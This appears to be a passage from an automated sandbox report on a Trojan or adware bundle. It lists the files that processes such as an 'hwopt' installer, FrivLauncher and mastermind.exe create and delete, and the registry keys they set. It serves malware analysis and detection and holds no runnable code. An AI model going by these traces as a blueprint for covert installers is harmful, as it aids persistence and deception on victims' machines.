%WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process regsvr32.exe:3056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
The process regsvr32.exe:2700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)
The process summit_sharma.exe:2672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\holder0.aiph (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (0 bytes)
The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.err (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (591 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\system (4112 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (521 bytes)
%System%\config (672 bytes)
%System%\config\SYSTEM.LOG (8146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (0 bytes)
The process EditBinx86.exe:960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
The process EditBinx86.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
The process mofcomp.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (0 bytes)
The process ngen.exe:332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)
The process ngen.exe:276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (544 bytes)
The process ngen.exe:2092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1072 bytes)
The process ngen.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)
The process ngen.exe:2136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1418 bytes)
The process ngen.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)
The process ngen.exe:2056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1162 bytes)
The process ngen.exe:3340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)
The process ngen.exe:2248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)
The process ngen.exe:3160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)
The process ngen.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (740 bytes)
The process ngen.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1108 bytes)
The process ngen.exe:3232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)
The process ngen.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (848 bytes)
The process ngen.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (436 bytes)
The process ngen.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (768 bytes)
The process ngen.exe:2276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)
The process ngen.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1468 bytes)
The process ngen.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)
The process ngen.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:2160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1082 bytes)
The process ngen.exe:2148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (738 bytes)
The process cvtres.exe:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)
The process cvtres.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)
The process cvtres.exe:1556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)
The process cvtres.exe:952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)
The process cvtres.exe:1064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\RES14.tmp (2892 bytes)
The process cvtres.exe:340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)
The process cvtres.exe:164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)
The process cvtres.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)
The process cvtres.exe:364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)
The process Osman_Navigation.exe:4072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\setupapi.log (4240 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
%Program Files%\FrivLauncher\uninst.exe (8693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
%Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
%WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (0 bytes)
The process PSSetupNativeUtils.exe:968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process fileman.exe:1636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)
The process mastermind.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nspF9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (0 bytes)
The process hwopt12052016001648.exe:912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config (488 bytes)
%System%\config\system (7996 bytes)
%System%\config\SYSTEM.LOG (15882 bytes)
Registry activity
The process csc.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 1F E7 ED 31 8D C9 F6 69 AE 57 1E BE DA 76 B6"
The process csc.exe:888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 61 64 50 40 79 05 10 3D 09 84 64 7C 08 97 F0"
The process csc.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 87 E0 36 3A E6 68 43 CE E6 F9 18 A2 CA C0 7B"
The process csc.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 87 17 28 8D 1F 3A 9D 3F 90 07 8E EF 70 B1 09"
The process csc.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 3B 6A C9 A3 78 4B 96 06 A6 65 46 65 3A 91 F5"
The process csc.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 5E 46 39 2E 43 C0 3E 99 71 0C 33 2C 9C BE C1"
The process csc.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 1E D1 1E 10 9A 45 C2 B0 1E BD E7 4A 8B C9 5C"
The process csc.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 8E 48 1E CA 74 C8 72 83 F7 24 0F 2E FD 00 36"
The process csc.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 22 F9 27 A7 C3 F3 60 04 14 0D 8A 19 69 55 FB"
The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\data]
"uninstaller_path" = "C:\Windows\hwopt_12052016001648"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallLocation" = "C:\Windows\hwopt_12052016001648\"
"QuietUninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe /SILENT"
"DisplayVersion" = "3.0.10"
"Inno Setup: Icon Group" = "hwopt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"EditBinx86.exe" = "EditBin"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MajorVersion" = "3"
"NoModify" = "1"
[HKLM\SOFTWARE]
"hwopt" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"UninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallDate" = "20160512"
"Publisher" = "hwopt"
"URLInfoAbout" = "http://genisys.online"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallationStatsUploder_12052016001648.exe" = "InstallationStatsUploder"
